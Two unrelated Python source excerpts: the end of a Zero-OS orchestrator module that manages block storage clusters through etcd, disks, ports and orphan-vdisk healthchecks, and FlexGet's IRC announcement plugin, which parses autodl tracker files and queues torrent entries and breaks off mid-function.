etcd = EtcdCluster.from_ays(etcd_cluster, job.context['token'])
cluster = BlockCluster.from_ays(service, job.context['token'])
config = cluster.get_config()
config = {
"servers": config["dataStorage"],
}
yamlconfig = yaml.safe_dump(config, default_flow_style=False)
etcd.put(key="%s:cluster:conf:storage" % service.name, value=yamlconfig)
def delete_config(job):
from zeroos.orchestrator.sal.ETCD import EtcdCluster
from zeroos.orchestrator.configuration import get_jwt_token
job.context['token'] = get_jwt_token(job.service.aysrepo)
service = job.service
etcd_clusters = job.service.aysrepo.servicesFind(role='etcd_cluster')
if not etcd_clusters:
j.exceptions.RuntimeError('No etcd cluster found')
etcd_cluster = etcd_clusters[0]
etcd = EtcdCluster.from_ays(etcd_cluster, job.context['token'])
etcd.delete(key="%s:cluster:conf:storage" % service.name)
def get_availabledisks(job):
from zeroos.orchestrator.sal.StorageCluster import BlockCluster
from zeroos.orchestrator.utils import find_disks
service = job.service
used_disks = {}
for node in service.model.data.nodes:
disks = set()
pools = service.aysrepo.servicesFind(role='storagepool', parent='node.zero-os!%s' % node)
for pool in pools:
devices = {device.device for device in pool.model.data.devices}
disks.update(devices)
used_disks[node] = disks
cluster = BlockCluster.from_ays(service, job.context['token'])
partition_name = 'sp_cluster_{}'.format(cluster.name)
availabledisks = find_disks(service.model.data.diskType, cluster.nodes, partition_name)
freedisks = {}
for node, disks in availabledisks.items():
node_disks = []
for disk in disks:
if disk.devicename not in used_disks[node]:
node_disks.append(disk)
freedisks[node] = node_disks
return freedisks
def get_baseports(job, node, baseport, nrports):
service = job.service
tcps = service.aysrepo.servicesFind(role='tcp', parent='node.zero-os!%s' % node.name)
usedports = set()
for tcp in tcps:
usedports.add(tcp.model.data.port)
freeports = []
tcpactor = service.aysrepo.actorGet("tcp")
tcpservices = []
while True:
if baseport not in usedports:
baseport = node.freeports(baseport=baseport, nrports=1)[0]
args = {
'node': node.name,
'port': baseport,
}
tcp = 'tcp_{}_{}'.format(node.name, baseport)
tcpservices.append(tcpactor.serviceCreate(instance=tcp, args=args))
freeports.append(baseport)
if len(freeports) >= nrports:
return freeports, tcpservices
baseport += 1
def install(job):
from zeroos.orchestrator.configuration import get_jwt_token
job.context['token'] = get_jwt_token(job.service.aysrepo)
dashboardsrv = job.service.aysrepo.serviceGet(role='dashboard', instance=job.service.name, die=False)
if dashboardsrv:
cluster = get_cluster(job)
dashboardsrv.model.data.dashboard = cluster.dashboard
dashboardsrv.executeAction('install', context=job.context)
save_config(job)
job.service.model.actions['start'].state = 'ok'
job.service.model.data.status = 'ready'
job.service.saveAll()
monitor(job)
def start(job):
service = job.service
cluster = get_cluster(job)
job.logger.info("start cluster {}".format(service.name))
cluster.start()
job.service.model.data.status = 'ready'
def stop(job):
from zeroos.orchestrator.configuration import get_jwt_token
job.context['token'] = get_jwt_token(job.service.aysrepo)
service = job.service
storage_engines = service.producers.get("storage_engine", [])
for storage_engine in storage_engines:
storage_engine.executeAction("stop", context=job.context)
def delete(job):
from zeroos.orchestrator.configuration import get_jwt_token
job.context['token'] = get_jwt_token(job.service.aysrepo)
service = job.service
storageEngines = service.producers.get('storage_engine', [])
pools = service.producers.get('storagepool', [])
filesystems = service.producers.get('filesystem', [])
for storageEngine in storageEngines:
tcps = storageEngine.producers.get('tcp', [])
for tcp in tcps:
tcp.executeAction('drop', context=job.context)
tcp.delete()
container = storageEngine.parent
container.executeAction('stop', context=job.context)
container.delete()
for filesystem in filesystems:
filesystem.executeAction('delete', context=job.context)
filesystem.delete()
for pool in pools:
pool.executeAction('delete', context=job.context)
pool.delete()
delete_config(job)
job.logger.info("stop cluster {}".format(service.name))
job.service.model.data.status = 'empty'
def list_vdisks(job):
import random
from zeroos.orchestrator.configuration import get_configuration
from zeroos.orchestrator.sal.Container import Container
from zeroos.orchestrator.sal.Node import Node
from zeroos.orchestrator.configuration import get_jwt_token
from zeroos.orchestrator.sal.ETCD import EtcdCluster
job.context['token'] = get_jwt_token(job.service.aysrepo)
service = job.service
nodes = [node for node in service.producers['node'] if node.model.data.status != "halted"]
node = random.choice(nodes)
# create temp container of 0-disk
container_name = 'vdisk_list_{}'.format(service.name)
node = Node.from_ays(node, job.context['token'])
config = get_configuration(job.service.aysrepo)
container = Container(name=container_name,
flist=config.get('0-disk-flist', 'https://hub.gig.tech/gig-official-apps/0-disk-master.flist'),
host_network=True,
node=node)
container.start()
try:
etcd_cluster_service = service.aysrepo.servicesFind(role='etcd_cluster')[0]
etcd_cluster_sal = EtcdCluster.from_ays(etcd_cluster_service, job.context['token'])
cmd = '/bin/zeroctl list vdisks {cluster_id} --config {etcd}'
cmd = cmd.format(cluster_id=service.name, etcd=etcd_cluster_sal.dialstrings)
job.logger.debug(cmd)
result = container.client.system(cmd).get()
if result.state != 'SUCCESS':
# return empty list if no vdisks are found
if not result.stderr:
return []
raise j.exceptions.RuntimeError("Failed to run zeroctl list {} {}".format(result.stdout, result.stderr))
return result.stdout.splitlines()
finally:
container.stop()
def monitor(job):
import time
from zeroos.orchestrator.sal.StorageCluster import BlockCluster
from zeroos.orchestrator.configuration import get_jwt_token
job.context['token'] = get_jwt_token(job.service.aysrepo)
service = job.service
cluster = BlockCluster.from_ays(service, job.context['token'])
if service.model.data.status == 'ready' and not cluster.is_running():
cluster.start()
healthcheck_service = job.service.aysrepo.serviceGet(role='healthcheck',
instance='storagecluster_block_%s' % service.name,
die=False)
if healthcheck_service is None:
healthcheck_actor = service.aysrepo.actorGet('healthcheck')
healthcheck_service = healthcheck_actor.serviceCreate(instance='storagecluster.block_%s' % service.name)
service.consume(healthcheck_service)
# Get orphans
total_disks = set(list_vdisks(job))
vdisk_services = service.aysrepo.servicesFind(role='vdisk', producer="%s!%s" % (service.model.role, service.name))
nonorphans = {disk.name for disk in vdisk_services if disk.model.data.status != "orphan"}
old_orphans_services = {disk for disk in vdisk_services if disk.model.data.status == "orphan"}
old_orphans = set()
for orphan_service in old_orphans_services:
# Delete orphan vdisk if operator didn't act for 7 days
orphan_time = (int(time.time()) - orphan_service.model.data.timestamp) / (3600 * 24)
if orphan_time >= 7:
orphan_service.executeAction('delete', context=job.context)
orphan_service.delete()
continue
old_orphans.add(orphan_service.name)
new_orphans = total_disks - nonorphans
total_orphans = new_orphans | old_orphans
for orphan in new_orphans:
actor = service.aysrepo.actorGet('vdisk')
args = {
"status": "orphan",
"timestamp": int(time.time()),
"storageCluster": service.name,
}
actor.serviceCreate(instance=orphan, args=args)
healthcheck = {
"id": "storageclusters",
"name": "storagecluster orphan vdisk report",
"messages": [],
}
for orphan in total_orphans:
healthcheck["messages"].append({
"id": orphan,
"status": "WARNING",
"text": "Orphan vdisk %s is found" % orphan,
})
update_healthcheck(job, healthcheck_service, healthcheck)
def update_healthcheck(job, health_service, healthchecks):
import time
service = job.service
interval = service.model.actionGet('monitor').period
new_healthchecks = list()
if not isinstance(healthchecks, list):
healthchecks = [healthchecks]
defaultresource = '/storageclusters/{}'.format(service.name)
for health_check in healthchecks:
for health in health_service.model.data.healthchecks:
# If this healthcheck already exists, update its attributes
if health.id == health_check['id']:
health.name = health_check.get('name', '')
health.resource = health_check.get('resource', defaultresource) or defaultresource
health.messages = health_check.get('messages', [])
health.category = health_check.get('category', '')
health.lasttime = time.time()
health.interval = interval
health.stacktrace = health_check.get('stacktrace', '')
break
else:
# healthcheck doesn't exist in the current list, add it to the list of new
health_check['lasttime'] = time.time()
health_check['interval'] = interval
new_healthchecks.append(health_check)
old_healthchecks = health_service.model.data.to_dict().get('healthchecks', [])
old_healthchecks.extend(new_healthchecks)
health_service.model.data.healthchecks = old_healthchecks
def addStorageServer(job):
raise NotImplementedError()
def reoveStorageServer(job):
raise NotImplementedError()
| |
from __future__ import unicode_literals, division, absolute_import, with_statement
from builtins import * # noqa pylint: disable=unused-import, redefined-builtin
from past.builtins import basestring
from future.moves.urllib.parse import quote
import os
import re
import threading
import logging
from xml.etree.ElementTree import parse
import io
from uuid import uuid4
import time
from datetime import datetime, timedelta
from flexget.entry import Entry
from flexget.config_schema import register_config_key
from flexget.event import event
from flexget.manager import manager
from flexget.config_schema import one_or_more
from flexget.utils import requests
from flexget.utils.tools import get_config_hash
try:
from irc_bot.irc_bot import IRCBot, partial
from irc_bot import irc_bot
except ImportError as e:
irc_bot = None
IRCBot = object
log = logging.getLogger('irc')
MESSAGE_CLEAN = re.compile("\x0f|\x1f|\x02|\x03(?:[\d]{1,2}(?:,[\d]{1,2})?)?", re.MULTILINE | re.UNICODE)
URL_MATCHER = re.compile(r'(https?://[\da-z\.-]+\.[a-z\.]{2,6}[/\w\.-\?&]*/?)', re.MULTILINE | re.UNICODE)
channel_pattern = {
'type': 'string', 'pattern': '^([#&][^\x07\x2C\s]{0,200})',
'error_pattern': 'channel name must start with # or & and contain no commas and whitespace'
}
schema = {
'oneOf': [
{
'type': 'object',
'additionalProperties': {
'type': 'object',
'properties': {
'tracker_file': {'type': 'string'},
'server': {'type': 'string'},
'port': {'type': 'integer'},
'nickname': {'type': 'string'},
'channels': one_or_more(channel_pattern),
'nickserv_password': {'type': 'string'},
'invite_nickname': {'type': 'string'},
'invite_message': {'type': 'string'},
'task': one_or_more({
'type': 'string'
}),
'task_re': {
'type': 'object',
'additionalProperties': one_or_more({
'type': 'object',
'properties': {
'regexp': {'type': 'string'},
'field': {'type': 'string'}
},
'required': ['regexp', 'field'],
'additionalProperties': False
})
},
'queue_size': {'type': 'integer', 'default': 1},
'use_ssl': {'type': 'boolean', 'default': False},
'task_delay': {'type': 'integer'},
},
'anyOf': [
{'required': ['server', 'channels']},
{'required': ['tracker_file']}
],
'error_anyOf': 'Must specify a tracker file or server and channel(s)',
'oneOf': [
{'required': ['task']},
{'required': ['task_re']}
],
'error_oneOf': 'Must specify a task',
'required': ['port'],
'additionalProperties': {'type': 'string'},
}
},
{'type': 'boolean', 'enum': [False]},
]
}
# Global that holds all the IRCConnection instances
irc_connections = {}
# The manager object and thread
irc_manager = None
# To avoid having to restart the connections whenever the config updated event is fired (which is apparently a lot)
config_hash = {}
def create_thread(name, conn):
"""
Creates a new thread and starts it
:param conn: IRCConnection or IRCConnectionManager object
:return: Thread
"""
thread = threading.Thread(target=conn.start, name=name)
thread.setDaemon(True)
return thread
def irc_prefix(var):
"""
Prefix a string with the irc_
:param var: Variable to prefix
:return: Prefixed variable
"""
if isinstance(var, basestring):
return 'irc_%s' % var.lower()
def strip_whitespace(value):
"""
Remove leading and trailing whitespace from strings. Return value if not a string.
:param value:
:return: stripped string or value
"""
if isinstance(value, basestring):
return value.strip()
return value
class TrackerFileParseError(Exception):
"""Exception thrown when parsing the tracker file fails"""
class TrackerFileError(Exception):
"""Exception thrown when parsing the tracker file fails"""
class MissingConfigOption(Exception):
"""Exception thrown when a config option specified in the tracker file is not on the irc config"""
class IRCConnection(IRCBot):
def __init__(self, config, config_name):
self.config = config
self.connection_name = config_name
self.tracker_config = None
self.server_list = []
self.announcer_list = []
self.ignore_lines = []
self.message_regex = []
# If we have a tracker config file, load it
tracker_config_file = config.get('tracker_file')
if tracker_config_file:
self.tracker_config = self.retrieve_tracker_config(tracker_config_file)
channel_list = []
if self.tracker_config is not None:
# Validate config with the settings in the torrent file
for param in self.tracker_config.find('settings'):
# Handle textbox entries
if param.tag == 'textbox':
value_name = param.get('name')
else:
value_name = param.tag
# Strip the gazelle prefix
if value_name.startswith('gazelle_'):
value_name = value_name.replace('gazelle_', '')
# Skip descriptions
if 'description' in value_name:
continue
if self.config.get(value_name) is None:
raise MissingConfigOption('missing configuration option on irc config %s: %s' %
(self.connection_name, value_name))
# Get the tracker name, for use in the connection name
self.connection_name = self.tracker_config.get('longName', config_name)
# Extract the IRC server information
for server in self.tracker_config.find('servers'):
self.server_list.extend(server.get('serverNames').split(','))
channel_list.extend(server.get('channelNames').split(','))
self.announcer_list.extend(server.get('announcerNames').split(','))
# Process ignore lines
for regex_values in self.tracker_config.findall('parseinfo/ignore/regex'):
rx = re.compile(regex_values.get('value'), re.UNICODE | re.MULTILINE)
self.ignore_lines.append((rx, regex_values.get('expected') != 'false'))
# Parse patterns
self.multilinepatterns = self.parse_patterns(list(
self.tracker_config.findall('parseinfo/multilinepatterns/extract')))
self.linepatterns = self.parse_patterns(list(
self.tracker_config.findall('parseinfo/linepatterns/extract')))
# overwrite tracker config with flexget config
if self.config.get('server'):
self.server_list = [self.config['server']]
log.debug('Using server specified from config')
channels = config.get('channels')
if channels:
channel_list = channels if isinstance(channels, list) else [channels]
log.debug('Using channel(s) specified from config')
log.debug('Servers: %s', self.server_list)
log.debug('Channels: %s', channel_list)
log.debug('Announcers: %s', self.announcer_list)
log.debug('Ignore Lines: %d', len(self.ignore_lines))
log.debug('Message Regexs: %d', len(self.multilinepatterns) + len(self.linepatterns))
for rx, vals, optional in self.multilinepatterns:
msg = ' Multilinepattern "%s" extracts %s'
if optional:
msg += ' (optional)'
log.debug(msg, rx.pattern, vals)
for rx, vals, optional in self.linepatterns:
msg = ' Linepattern "%s" extracts %s'
if optional:
msg += ' (optional)'
log.debug(msg, rx.pattern, vals)
# Init the IRC Bot
ircbot_config = {'servers': self.server_list, 'port': config['port'], 'channels': channel_list,
'nickname': config.get('nickname', 'Flexget-%s' % str(uuid4())),
'invite_nickname': config.get('invite_nickname'),
'invite_message': config.get('invite_message'),
'nickserv_password': config.get('nickserv_password'),
'use_ssl': config.get('use_ssl')}
IRCBot.__init__(self, ircbot_config)
self.inject_before_shutdown = False
self.entry_queue = []
self.line_cache = {}
self.processing_message = False # if set to True, it means there's a message processing queued
self.thread = create_thread(self.connection_name, self)
@classmethod
def read_tracker_config(cls, path):
"""
Attempts to open and parse the .tracker file specified in path
:param path: path to .tracker file
:return: the parsed XML
"""
try:
tracker_config = parse(path).getroot()
except Exception as e:
raise TrackerFileParseError('Unable to parse tracker config file %s: %s' % (path, e))
else:
return tracker_config
@classmethod
def retrieve_tracker_config(cls, tracker_config_file):
"""
Will attempt to retrieve the .tracker file from disk or github. Returns the parsed XML.
:param tracker_config_file: URL or path to .tracker file
:return: parsed XML
"""
base_url = 'https://raw.githubusercontent.com/autodl-community/autodl-trackers/master/'
tracker_config_file = os.path.expanduser(tracker_config_file)
# First we attempt to find the file locally as-is
if os.path.exists(tracker_config_file):
log.debug('Found tracker file: %s', tracker_config_file)
return cls.read_tracker_config(tracker_config_file)
if not tracker_config_file.endswith('.tracker'):
tracker_config_file += '.tracker'
# Maybe the file is missing extension?
if os.path.exists(tracker_config_file):
log.debug('Found tracker file: %s', tracker_config_file)
return cls.read_tracker_config(tracker_config_file.rsplit('.tracker')[0])
# Check that containing dir exists, otherwise default to flexget_config_dir/trackers
if os.path.exists(os.path.dirname(tracker_config_file)):
base_dir = os.path.dirname(tracker_config_file)
else:
base_dir = os.path.abspath(os.path.join(manager.config_base, 'trackers'))
# Find the filenames for easy use later
tracker_name = os.path.basename(tracker_config_file)
tracker_name_no_ext = os.path.splitext(tracker_name)[0]
# One last try with case insensitive search!
if os.path.exists(base_dir):
files = os.listdir(base_dir)
for f in files:
if tracker_name_no_ext.lower() in f.lower():
found_path = os.path.join(base_dir, f)
log.debug('Found tracker file: %s', found_path)
return cls.read_tracker_config(found_path)
# Download from Github instead
if not os.path.exists(base_dir): # will only try to create the default `trackers` dir
try:
os.mkdir(base_dir)
except IOError as e:
raise TrackerFileError(e)
log.info('Tracker file not found on disk. Attempting to fetch tracker config file from Github.')
tracker = None
try:
tracker = requests.get(base_url + tracker_config_file)
except (requests.RequestException, IOError):
pass
if not tracker:
try:
log.debug('Trying to search list of tracker files on Github')
# Try to see if it's not found due to case sensitivity
trackers = requests.get('https://api.github.com/repos/autodl-community/'
'autodl-trackers/git/trees/master?recursive=1').json().get('tree', [])
for t in trackers:
name = t.get('path', '')
if not name.endswith('.tracker') or name.lower() != tracker_name.lower():
continue
tracker = requests.get(base_url + name)
tracker_name = name
break
except (requests.RequestException, IOError) as e:
raise TrackerFileError(e)
if not tracker:
raise TrackerFileError('Unable to find %s on disk or Github. Did you spell it correctly?' %
tracker_config_file)
# If we got this far, let's save our work :)
save_path = os.path.join(base_dir, tracker_name)
with io.open(save_path, 'wb') as tracker_file:
for chunk in tracker.iter_content(8192):
tracker_file.write(chunk)
return cls.read_tracker_config(save_path)
def is_alive(self):
return self.thread and self.thread.is_alive()
def parse_patterns(self, patterns):
"""
Parses the patterns and creates a tuple with the compiled regex pattern and the variables it produces
:param patterns: list of regex patterns as .tracker XML
:return: list of (regex, variables, optional)-pairs
"""
result = []
for pattern in patterns:
rx = re.compile(pattern.find('regex').get('value'), re.UNICODE | re.MULTILINE)
vals = [var.get('name') for idx, var in enumerate(pattern.find('vars'))]
optional = True if pattern.get('optional', 'false').lower() == 'true' else False
result.append((rx, vals, optional))
return result
def quit(self):
"""
Quit the IRC bot
:return:
"""
if self.inject_before_shutdown and self.entry_queue:
self.run_tasks()
IRCBot.quit(self)
def run_tasks(self):
"""
Passes entries to the target task(s) configured for this connection
:return:
"""
tasks = self.config.get('task')
tasks_re = self.config.get('task_re')
if tasks:
if isinstance(tasks, basestring):
tasks = [tasks]
log.debug('Injecting %d entries into tasks %s', len(self.entry_queue), ', '.join(tasks))
manager.execute(options={'tasks': tasks, 'cron': True, 'inject': self.entry_queue, 'allow_manual': True},
priority=5)
if tasks_re:
tasks_entry_map = {}
for entry in self.entry_queue:
matched = False
for task, config in tasks_re.items():
if isinstance(config, dict):
config = [config]
for c in config:
if re.search(c['regexp'], entry.get(c['field'], ''), re.IGNORECASE):
matched = True
if not tasks_entry_map.get(task):
tasks_entry_map[task] = []
tasks_entry_map[task].append(entry)
if not matched:
log.debug('Entry "%s" did not match any task regexp.', entry['title'])
for task, entries in tasks_entry_map.items():
log.debug('Injecting %d entries into task "%s"', len(entries), task)
manager.execute(options={'tasks': [task], 'cron': True, 'inject': entries, 'allow_manual': True},
priority=5)
self.entry_queue = []
def queue_entry(self, entry):
"""
Stores an entry in the connection entry queue, if the queue is over the size limit then submit them
:param entry: Entry to be queued
:return:
"""
self.entry_queue.append(entry)
log.debug('Entry: %s', entry)
if len(self.entry_queue) >= self.config['queue_size']:
if self.config.get('task_delay'):
self.schedule.queue_command(self.config['task_delay'], self.run_tasks, unique=False)
else:
self.run_tasks()
def match_message_patterns(self, patterns, msg):
"""
Tries to match the message to the list of patterns. Supports multiline messages.
:param patterns: list of (regex, variable)-pairs
:param msg: The parsed IRC message
:param multiline: True if msg is multiline
:return: A dict of the variables and their extracted values
"""
result = {}
for rx, vals, _ in patterns:
log.debug('Using pattern %s to parse message vars', rx.pattern)
match = rx.search(msg)
if match:
val_names = [irc_prefix(val.lower()) for val in vals]
val_values = [strip_whitespace(x) or '' for x in match.groups()]
result.update(dict(zip(val_names, val_values)))
log.debug('Found: %s', dict(zip(val_names, val_values)))
break
else:
log.debug('No matches found for %s in %s', rx.pattern, msg)
return result
def process_tracker_config_rules(self, entry, rules=None):
"""
Processes an Entry object with the linematched rules defined in a tracker config file
:param entry: Entry to be updated
:param rules: Ruleset to use.
:return:
"""
ignore_optionals = []
if rules is None:
rules = self.tracker_config.find('parseinfo/linematched')
# Make sure all irc fields from entry are in `fields`
fields = {key: val for key, val in entry.items() if key.startswith('irc_')}
for rule in rules:
log.debug('Processing rule %s' % rule.tag)
# Var - concat a var from other vars
if rule.tag == 'var':
result = ''
for element in rule:
if element.tag == 'string':
result += element.get('value')
elif element.tag in ['var', 'varenc']:
varname = element.get('name')
if irc_prefix(varname) in fields:
value = fields[irc_prefix(varname)]
elif self.config.get(varname):
value = self.config.get(varname)
else:
log.error('Missing variable %s from config, skipping rule', irc_prefix(varname))
break
if element.tag == 'varenc':
value = quote(value.encode('utf-8'))
result += value
else:
log.error('Unsupported var operation %s, skipping rule', element.tag)
break
else:
# Only set the result if we processed all elements
log.debug('Result for rule %s: %s=%s', rule.tag, rule.get('name'), result)
fields[irc_prefix(rule.get('name'))] = result
# Var Replace - replace text in a var
elif rule.tag == 'varreplace':
source_var = irc_prefix(rule.get('srcvar'))
target_var = irc_prefix(rule.get('name'))
regex = rule.get('regex')
replace = rule.get('replace')
if source_var and target_var and regex is not None and replace is not None and source_var in fields:
fields[target_var] = re.sub(regex, replace, fields[source_var])
log.debug('varreplace: %s=%s', target_var, fields[target_var])
else:
log.error('Invalid varreplace options, skipping rule')
# Extract - create multiple vars from a single regex
elif rule.tag == 'extract':
source_var = irc_prefix(rule.get('srcvar'))
if source_var not in fields:
if rule.get('optional', 'false') == 'false':
log.error('Error processing extract rule, non-optional value %s missing!', source_var)
ignore_optionals.append(source_var)
continue
if rule.find('regex') is not None:
regex = rule.find('regex').get('value')
else:
log.error('Regex option missing on extract rule, skipping rule')
continue
group_names = [irc_prefix(x.get('name')) for x in rule.find('vars') if x.tag == 'var']
match = re.search(regex, fields[source_var])
if match:
fields.update(dict(zip(group_names, match.groups())))
else:
log.debug('No match found for rule extract')
# Extract Tag - set a var if a regex matches a tag in a var
elif rule.tag == 'extracttags':
source_var = irc_prefix(rule.get('srcvar'))
split = rule.get('split')
if source_var in ignore_optionals:
continue
values = [strip_whitespace(x) for x in fields[source_var].split(split)]
for element in rule:
if element.tag == 'setvarif':
target_var = irc_prefix(element.get('varName'))
regex = element.get('regex')
value = element.get('value')
new_value = element.get('newValue')
if regex is not None:
found_match = False
for val in values:
match = re.match(regex, val)
if match:
fields[target_var] = val
found_match = True
if not found_match:
log.debug('No matches found for regex %s', regex)
elif value is not None and new_value is not None:
if value in values:
fields[target_var] = new_value
else:
log.debug('No match found for value %s in %s', value, source_var)
else:
log.error('Missing regex/value/newValue for setvarif command, ignoring')
# Extract One - extract one var from a list of regexes
elif rule.tag == 'extractone':
for element in rule:
if element.tag == 'extract':
source_var = irc_prefix(element.get('srcvar'))
if element.find('regex') is not None:
regex = element.find('regex').get('value')
else:
log.error('Regex option missing on extract rule, skipping.')
continue
if element.find('vars') is not None:
vars = [irc_prefix(var.get('name')) for var in element.find('vars')]
else:
log.error('No variable bindings found in extract rule, skipping.')
continue
match = re.match(regex, fields.get(source_var, ''))
if match:
fields.update(dict(zip(vars, match.groups())))
else:
log.debug('No match for extract with regex: %s', regex)
else:
log.error('Unsupported extractone tag: %s', element.tag)
# Set Regex - set a var if a regex matches
elif rule.tag == 'setregex':
source_var = irc_prefix(rule.get('srcvar'))
regex = rule.get('regex')
target_var = irc_prefix(rule.get('varName'))
target_val = rule.get('newValue')
if source_var and regex and target_var and target_val:
if source_var in fields and re.search(regex, fields[source_var]):
fields[target_var] = target_val
else:
log.error('Option missing on setregex, skipping rule')
# If statement
elif rule.tag == 'if':
source_var = irc_prefix(rule.get('srcvar'))
regex = rule.get('regex')
if source_var and regex:
if source_var in fields and re.match(regex, fields[source_var]):
fields.update(self.process_tracker_config_rules(fields, rule))
else:
log.error('Option missing for if statement, skipping rule')
else:
log.warning('Unsupported linematched tag: %s', rule.tag)
return fields
def on_privmsg(self, msg):
"""
Appends messages for the specific channel in the line cache. Schedules a message processing after 1s to
handle multiline announcements.
:param msg: IRCMessage object
:return:
"""
nickname = msg.from_nick
channel = msg.arguments[0]
if not irc_bot.is_channel(channel):
log.debug('Received msg is not a channel msg: %s', msg)
return
# set some defaults
self.line_cache.setdefault(channel, {})
self.line_cache[channel].setdefault(nickname, [])
self.line_cache[channel][nickname].append(msg.arguments[1])
if not self.processing_message:
# Schedule a parse of the message in 1 second (for multilines)
self.schedule.queue_command(1, partial(self.process_message, nickname, channel))
self.processing_message = True
def process_message(self, nickname, channel):
"""
Pops lines from the line cache and passes them to be parsed
:param str nickname: Nickname of who sent the message
:param str channel: Channel where the message originated from
:return: None
"""
# If we have announcers defined, ignore any messages not from them
if self.announcer_list and nickname not in self.announcer_list:
log.debug('Ignoring message: from non-announcer %s', nickname)
return
# Clean up the messages
lines = [MESSAGE_CLEAN.sub('', line) for line in self.line_cache[channel][nickname]]
log.debug('Received line(s): %s', u'\n'.join(lines))
# Generate some entries
if self.linepatterns:
entries = self.entries_from_linepatterns(lines)
elif self.multilinepatterns:
entries, lines = self.entries_from_multilinepatterns(lines)
else:
entries = self.entries_from_lines(lines)
for entry in entries:
# Process the generated entry through the linematched rules
if self.tracker_config is not None and entry:
entry.update(self.process_tracker_config_rules(entry))
elif self.tracker_config is not None:
log.error('Failed to parse message(s).')
return
entry['title'] = entry.get('irc_torrentname')
entry['url'] = entry.get('irc_torrenturl')
log.debug('Entry after processing: %s', dict(entry))
if not entry['url'] or not entry['title']:
log.error('Parsing message failed. Title=%s, url=%s.', entry['title'], entry['url'])
continue
log.verbose('IRC message in %s generated an entry: %s', channel, entry)
self.queue_entry(entry)
# reset the line cache
if self.multilinepatterns and lines:
self.line_cache[channel][nickname] = lines
log.debug('Left over lines: %s', '\n'.join(lines))
else:
self.line_cache[channel][nickname] = []
self.processing_message = False
def entries_from_linepatterns(self, lines):
"""
:param lines: list of lines from irc
:return list: list of entries generated from lines
"""
entries = []
for line in lines:
# If it's listed in ignore lines, skip it
for rx, expected in self.ignore_lines:
if rx.match(line) and expected:
log.debug('Ignoring message: matched ignore line')
continue
entry = Entry(irc_raw_message=line)
match = self.match_message_patterns(self.linepatterns, line)
# Generate the entry and process it through the linematched rules
if not match:
log.error('Failed to parse message. Skipping.')
continue
entry.update(match)
entries.append(entry)
return entries
def entries_from_multilinepatterns(self, lines):
"""
:param lines: list of lines
:return list: list of entries generated from lines
"""
entries = []
rest = [] # contains the rest of the lines
while len(lines) > 0:
entry = Entry()
raw_message = ''
matched_lines = []
for idx, (rx, vals, optional) in enumerate(self.multilinepatterns):
log.debug('Using pattern %s to parse message vars', rx.pattern)
# find the next candidate line
line = ''
for l in list(lines):
# skip ignored lines
for ignore_rx, expected in self.ignore_lines:
if ignore_rx.match(l) and expected:
log.debug('Ignoring message: matched ignore line')
lines.remove(l)
break
else:
line = l
break
raw_message += '\n' + line
match = self.match_message_patterns([(rx, vals, optional)], line)
if match:
entry.update(match)
matched_lines.append(line)
lines.remove(line)
elif optional:
log.debug('No match for optional extract pattern found.')
elif not line:
rest = matched_lines + lines
break
elif idx == 0: # if it's the first regex that fails, then it's probably just garbage
log.error('No matches found for pattern %s', rx.pattern)
lines.remove(line)
rest = lines
break
else:
log.error('No matches found for pattern %s', rx.pattern)
rest = lines
break
else:
entry['irc_raw_message'] = raw_message
entries.append(entry)
continue
return entries, rest
def entries_from_lines(self, lines):
"""
:param lines: list of lines
:return list: list of entries generated from lines
"""
entries = []
for line in lines:
entry = Entry(irc_raw_message=line)
# Use the message as title
entry['title'] = line
# find a url...
url_match = URL_MATCHER.findall(line)
if url_match:
# We have a URL(s)!, generate an entry
urls = list(url_match)
url = urls[-1]
entry.update({
'urls': urls,
'url': url,
})
if not entry.get('url'):
log.error('Parsing message failed. No url found.')
continue
entries.append(entry)
return entries
def is_connected(self):
return self.connected
def stop(self, wait):
if self.is_connected() and wait:
self.inject_before_shutdown = True
self.quit()
class IRCConnectionManager(object):
def __init__(self, config):
self.config = config
self.shutdown_event = threading.Event()
self.wait = False
self.delay = 30
self.thread = create_thread('irc_manager', self)
self.thread.start()
def is_alive(self):
return self.thread and self.thread.is_alive()
def start(self):
"""
Checks for dead threads and attempts to restart them. If the connection appears to be throttled, it won't
attempt to reconnect for 30s.
:return:
"""
global irc_connections
self.start_connections()
schedule = {} # used to keep track of reconnection schedules
while not self.shutdown_event.is_set():
for conn_name, conn in irc_connections.items():
# Don't want to revive if connection was closed cleanly
if not conn.running:
continue
now = datetime.now()
# Attempt to revive the thread if it has died. conn.running will be True if it died unexpectedly.
if not conn and self.config.get(conn_name):
try:
self.restart_connection(conn_name, self.config[conn_name])
except IOError as e:
log.error(e)
elif not conn.is_alive() and conn.running:
if conn_name not in schedule:
schedule[conn_name] = now + timedelta(seconds=5)
# add extra time if throttled
if conn.throttled:
schedule[conn_name] += timedelta(seconds=self.delay)
# is it time yet?
if schedule[conn_name] <= now:
log.error('IRC connection for %s has died unexpectedly. Restarting it.', conn_name)
try:
self.restart_connection(conn_name, conn.config)
except IOError as e:
log.error(e)
# remove it from the schedule
del schedule[conn_name]
time.sleep(1)
self.stop_connections(self.wait)
irc_connections = {}
def restart_connections(self, name=None):
if name:
self.restart_connection(name)
else:
for name, connection in irc_connections.items():
self.restart_connection(name, connection.config)
def restart_connection(self, name, config=None):
if not config:
config = irc_connections[name].config
if irc_connections[name].is_alive():
self.stop_connection(name)
irc_connections[name] = IRCConnection(config, name)
irc_connections[name].thread.start()
def start_connections(self):
"""
Start all the irc connections. Stop the daemon if there are failures.
:return:
"""
# First we validate the config for all connections including their .tracker files
for conn_name, config in self.config.items():
try:
log.info('Starting IRC connection for %s', conn_name)
conn = IRCConnection(config, conn_name)
irc_connections[conn_name] = conn
config_hash['names'][conn_name] = get_config_hash(config)
except (MissingConfigOption, TrackerFileParseError, TrackerFileError, IOError) as e:
log.error(e)
if conn_name in irc_connections:
del irc_connections[conn_name] # remove it from the list of connections
# Now we can start
for conn_name, connection in irc_connections.items():
connection.thread.start()
def stop_connections(self, wait, name=None):
if name:
self.stop_connection(name, wait)
else:
for name in irc_connections.keys():
self.stop_connection(name, wait)
def stop_connection(self, name, wait=False):
if irc_connections[name].is_alive():
irc_connections[name].stop(wait)
irc_connections[name].thread.join(11)
def stop(self, wait):
self.wait = wait
self.shutdown_event.set()
def status(self, name=None):
status = []
if name:
if name not in irc_connections:
raise ValueError('%s is not a valid irc connection' % name)
else:
status.append(self.status_dict(name))
else:
for n in irc_connections.keys():
status.append(self.status_dict(n))
return status
def status_dict(self, name):
status = {name: {}}
connection = irc_connections[name]
status[name]['alive'] = connection.is_alive()
status[name]['channels'] = [{key: value} for key, value in connection.channels.items()]
status[name]['connected_channels'] = connection.connected_channels
status[name]['server'] = connection.servers[0]
